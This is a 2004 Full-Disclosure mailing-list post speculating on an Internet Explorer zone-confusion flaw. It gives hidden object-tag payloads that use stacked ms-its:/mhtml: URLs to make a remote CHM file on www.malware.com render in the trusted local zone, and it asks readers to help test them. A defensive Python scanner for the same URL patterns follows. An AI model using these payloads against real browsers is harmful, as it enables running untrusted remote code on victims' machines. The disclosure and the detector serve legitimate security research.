[Full-Disclosure] COELACANTH: After Math

http-equiv_at_excite.com
Date: 06/11/04

    To: <full-disclosure@lists.netsys.com>
    Date: Fri, 11 Jun 2004 14:17:37 -0000
    
    

    There is a sneaking suspicion that you can put the site contents
    in the so-called 'local zone' or 'my computer'.

    Since it validates the 'front end' of the address and ends up at
    the 'back end' this all would seem very similar to:

    <object data="ms-its:mhtml:file://C:foo.mhtml!http://www.malware.com//bad.chm::/foo.html"
    type="text/x-scriptlet" style="visibility:hidden">

    where Internet Explorer gets 'confused' by the URL
    mhtml:file://C:foo.mhtml!, switches to the local zone as a
    result of C:, stays there, and passes through to the 'back end'
    http://www.malware.com//bad.chm::/foo.html on the remote server
    while in the 'local zone' and renders foo.html in there.

    If this peculiar DNS setup also has a 'proper' chm file on it
    the following should work [as it does on any server setup]:

    <object data="ms-its:http://www.malware.com//bad.chm::/foo.html"
    type="text/x-scriptlet" style="visibility:hidden">

    now as above if we include in the 'front end':

    ms-its:C:WINDOWSHelpiexplore.chm::/http://www.malware.com//bad.chm::/foo.html

    It should see it as in C: and make its little 'zone'
    determination first, then pass through to the 'back end'

    http://www.malware.com//bad.chm::/foo.html

    and render foo.html in the 'local zone' even though it is on the
    remote server.

    You'd have to tinker quite a bit:

    ms-its:C:::/http://www.malware.com//bad.chm::/foo.html
    ms-its:C:%2Fredir=/http://www.malware.com//bad.chm::/foo.html

    etc.

    Anyone have a server they care to set up?

    -- 
    http://www.malware.com
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
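
A content-filter check for the URL shapes discussed in the message above, as an added example that is not part of the original post: it flags markup whose ms-its:/mhtml: URL has a drive-letter 'front end' and a remote http 'back end'. The host name host.example, the function names and the verdict labels are assumptions, and the patterns cover only the forms quoted in the post.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Protocol wrappers named in the post; they can be stacked (ms-its:mhtml:...).
WRAPPER = re.compile(r'^(?:(?:ms-its|mhtml):)+', re.I)
LOCAL = re.compile(r'^(?:file:/*)?[a-z]:', re.I)   # drive-letter 'front end'
REMOTE = re.compile(r'https?://', re.I)            # remote 'back end'

def classify(url):
    """Return a verdict label for a wrapped URL, or None if it is not one."""
    u = unquote(re.sub(r'\s+', '', url))   # undo line wrapping, then %-escapes
    m = WRAPPER.match(u)
    if not m:
        return None
    rest = u[m.end():]
    if not REMOTE.search(rest):
        return None                        # wrapper with purely local content
    return 'local-front-remote-back' if LOCAL.match(rest) else 'remote-wrapper'

class Scanner(HTMLParser):
    """Collect URL-bearing attributes whose value classify() flags."""
    ATTRS = {'data', 'src', 'href', 'codebase'}

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in self.ATTRS and value and classify(value):
                self.findings.append((tag, name, classify(value)))

def scan(html):
    s = Scanner()
    s.feed(html)
    s.close()
    return s.findings

# Constructed sample markup; host.example is a placeholder host.
SAMPLE = '''<object data="ms-its:mhtml:file://C:foo.mhtml!
http://host.example//bad.chm::/foo.html" type="text/x-scriptlet"></object>
<object data="ms-its:http://host.example//bad.chm::/foo.html"></object>
<a href="http://host.example/index.html">plain link</a>
<img src="ms-its:C:%2Fredir=/http://host.example//bad.chm::/foo.html">'''

if __name__ == '__main__':
    for finding in scan(SAMPLE):
        print(finding)
```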
    
